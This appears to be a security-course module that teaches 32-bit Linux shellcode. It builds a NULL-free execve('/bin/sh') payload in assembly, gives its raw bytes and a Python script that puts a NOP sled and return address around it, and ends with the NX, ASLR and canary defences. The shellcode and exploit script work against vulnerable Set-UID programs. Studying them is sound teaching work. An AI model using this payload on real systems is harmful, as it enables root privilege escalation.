Shellcode
The previous module showed how overwriting a return address redirects execution to existing code — a target() function already in the binary. But real binaries rarely contain a ready-made execve("/bin/sh", …) call. When there is no convenient target to hijack, an attacker injects their own machine code into the process and points the return address at it. That injected payload is called shellcode, because its classic goal is spawning an interactive shell.
Writing shellcode forces you to understand the lowest-level details of how programs communicate with the operating system: the system-call interface.
The Linux system-call interface
User programs cannot directly access hardware resources — they must ask the kernel via system calls. On Linux, the CPU transitions from user mode to kernel mode, executes the requested service, and returns. In assembly you trigger this transition with a single instruction; which instruction depends on the ABI:
| ABI | Trigger instruction | Syscall # register | Arg registers (in order) |
|---|---|---|---|
x86 32-bit (int $0x80) |
int $0x80 |
%eax |
%ebx, %ecx, %edx, %esi, %edi, %ebp |
x86-64 (syscall) |
syscall |
%rax |
%rdi, %rsi, %rdx, %r10, %r8, %r9 |
The simplest example: getpid is syscall number 20 (0x14) on 32-bit Linux. To call it:
mov $0x14, %eax ; syscall number for getpid
int $0x80 ; enter the kernel
Every syscall has a fixed number you can look up (e.g., at syscalls32.paolostivanin.com). The kernel ignores register contents it does not need for a given call.
The target syscall: execve
The goal of most shellcode is to call execve, which replaces the current process image with a new program:
int execve(const char *filename, char *const argv[], char *const envp[]);
Called as execve("/bin/sh", {"/bin/sh", NULL}, NULL) it spawns a shell — and if the victim process was Set-UID root, that shell inherits root privileges.
On 32-bit Linux, sys_execve is syscall 0x0b (11). The register mapping is:
| Register | Value |
|---|---|
%eax |
0x0b (syscall number) |
%ebx |
pointer to the filename string ("/bin/sh") |
%ecx |
pointer to the argv array ({ptr_to_binsh, NULL}) |
%edx |
pointer to the envp array (NULL — no environment) |
Building execve shellcode step by step
The challenge is that shellcode is position-independent: it has no idea where in memory it will land, so it cannot use hardcoded addresses. The classic solution is to build the "/bin/sh" string and the argv array on the stack at runtime, then read the addresses back from %esp.
Step 1 — Push "/bin/sh" onto the stack
x86 push works on 4-byte dwords. The string "/bin/sh" is 7 bytes; pad it to 8 by writing "//bin/sh" (the double slash is harmless to the kernel). Push a null terminator first, then the string in reverse order:
xor %eax, %eax ; zero eax (no NULL bytes in the instruction)
mov %eax, %edx ; edx = 0 (envp = NULL)
push %eax ; push null terminator for the string
push $0x68732f6e ; "n/sh" (little-endian: 6e 2f 73 68)
push $0x69622f2f ; "//bi" (little-endian: 2f 2f 62 69)
mov %esp, %ebx ; ebx --> "//bin/sh\0" on the stack
After these pushes %esp points at the start of "//bin/sh", so mov %esp, %ebx gives us the filename pointer.
Step 2 — Build the argv array and set %ecx
execve needs argv = {ptr_to_binsh, NULL}. Push NULL (already in %eax) then push %ebx, then capture %esp:
push %eax ; argv[1] = NULL
push %ebx ; argv[0] = pointer to "//bin/sh"
mov %esp, %ecx ; ecx --> { ptr_to_binsh, NULL }
Step 3 — Set %eax and invoke
movb $0x0b, %al ; eax = 0x0b (low byte only — avoids NULL bytes)
int $0x80 ; syscall: execve("//bin/sh", argv, NULL)
Complete NULL-free shellcode
xor %eax, %eax ; eax = 0
mov %eax, %edx ; edx = 0 (envp)
push %eax ; null terminator
push $0x68732f6e ; "n/sh"
push $0x69622f2f ; "//bi"
mov %esp, %ebx ; ebx --> filename
push %eax ; argv[1] = NULL
push %ebx ; argv[0] = ptr to filename
mov %esp, %ecx ; ecx --> argv
movb $0x0b, %al ; eax = 11
int $0x80
The NULL-byte problem — and how to fix it
String-copying functions like strcpy and gets stop at the first \x00 byte. A single NULL byte anywhere in the shellcode silently truncates the payload — the rest of the code never reaches the buffer.
The naive version of this shellcode contains several NULL bytes:
b8 0b 00 00 00 mov $0xb, %eax ← three NULLs
b9 00 00 00 00 mov $0x0, %ecx ← four NULLs
ba 00 00 00 00 mov $0x0, %edx ← four NULLs
6a 00 push $0x0 ← one NULL
The fixes applied above:
| Naive (contains NULLs) | NULL-free replacement | Why it works |
|---|---|---|
mov $0x0, %eax |
xor %eax, %eax |
XOR of a register with itself is always 0; opcode 31 c0 has no zero bytes |
push $0x0 |
push %eax (after zeroing) |
pushes the already-zeroed register |
mov $0x0b, %eax (opcode b8 0b 00 00 00) |
movb $0x0b, %al (opcode b0 0b) |
writes only the low byte; upper bytes were already zeroed by xor |
mov $0x0, %edx |
mov %eax, %edx (after zeroing %eax) |
copies zero without embedding a zero byte |
Assembling and extracting the bytes
Write the shellcode as an assembly file (shellcode.S), assemble it, then extract the raw bytes with objcopy or objdump:
gcc -m32 -nostdlib -static -o shellcode shellcode.S
objdump -d shellcode | grep -Po '\\t\K[0-9a-f ]+(?=\t)'
The slides show the assembled bytes for the complete shellcode:
\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68
\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89
\xe1\xb0\x0b\xcd\x80
No byte in this sequence is \x00.
Delivering the shellcode: the exploit script
With the raw bytes in hand, the exploit script (Python 3) assembles the full payload:
#!/usr/bin/env python3
import sys
shellcode = (
b"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68"
b"\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89"
b"\xe1\xb0\x0b\xcd\x80"
)
content = bytearray(0x90 for _ in range(100)) # NOP sled
start = 16
content[start:start + len(shellcode)] = shellcode
ret = 0xffffcfd0 # estimated address inside the NOP sled
offset = 76 # bytes from buffer start to saved return address
L = 4 # 4 bytes for 32-bit address
content[offset:offset + L] = ret.to_bytes(L, byteorder='little')
sys.stdout.buffer.write(content)
Key points: the buffer is prefilled with \x90 (NOP, opcode 0x90) rather than 'A', the shellcode is placed at an arbitrary offset inside the sled, and the return address is written at the offset discovered by cyclic/GDB. Because x86 is little-endian, ret.to_bytes(L, byteorder='little') writes the address bytes in the correct order.
Guessing the address: the NOP sled
Even after finding the buffer-to-return-address offset, you still need to guess where in memory the buffer lives — that is, what value to write as the new return address. Stack addresses vary between runs due to environment differences and ASLR.
The NOP sled (\x90\x90…) solves this: if the guessed address lands anywhere in the sled, execution slides harmlessly down the NOPs into the shellcode. A 100-byte NOP sled widens the valid target window by 100 addresses, making imprecise guesses succeed.
Defenses that break this attack
Two mitigations directly target shellcode injection:
- Non-Executable Stack (NX / W^X): Hardware marks stack pages as non-executable. If
%eipever points into the stack, the CPU raises a fault. This stops injected shellcode cold — which is why modern exploit technique pivoted to Return-Oriented Programming (ROP), reusing existing executable code. - ASLR (Address Space Layout Randomization): The OS randomizes the base address of the stack (and heap, libraries) on every execution. With
kernel.randomize_va_space=2, both stack and heap addresses change each run, making it hard to guess where the NOP sled lives. Thegcc -no-pie -fno-picflags produce position-independent-code-free binaries that use absolute addresses and are easier to exploit; PIE binaries with ASLR are much harder. - Stack canaries (StackGuard): A secret value placed between the buffer and the return address; overwriting it is detected before
retexecutes.
Key takeaways
- Shellcode is self-contained machine code injected into a vulnerable process to perform an action — typically spawning a shell via a direct syscall.
- The 32-bit Linux syscall ABI: load the syscall number into
%eax, arguments into%ebx/%ecx/%edx, then executeint $0x80. sys_execveis syscall0x0b; its three arguments map to%ebx(filename),%ecx(argv),%edx(envp).- Position independence is achieved by building strings and pointer arrays on the stack at runtime and reading addresses from
%esp. - Every instruction that encodes a zero byte must be replaced:
xor %eax,%eaxinstead ofmov $0,%eax;movb $0x0b,%alinstead ofmov $0x0b,%eax. - A NOP sled (
\x90bytes prepended to the shellcode) tolerates imprecise guesses of the shellcode's address. - NX stack defeats injected shellcode by making stack pages non-executable; ASLR makes the injection address hard to guess.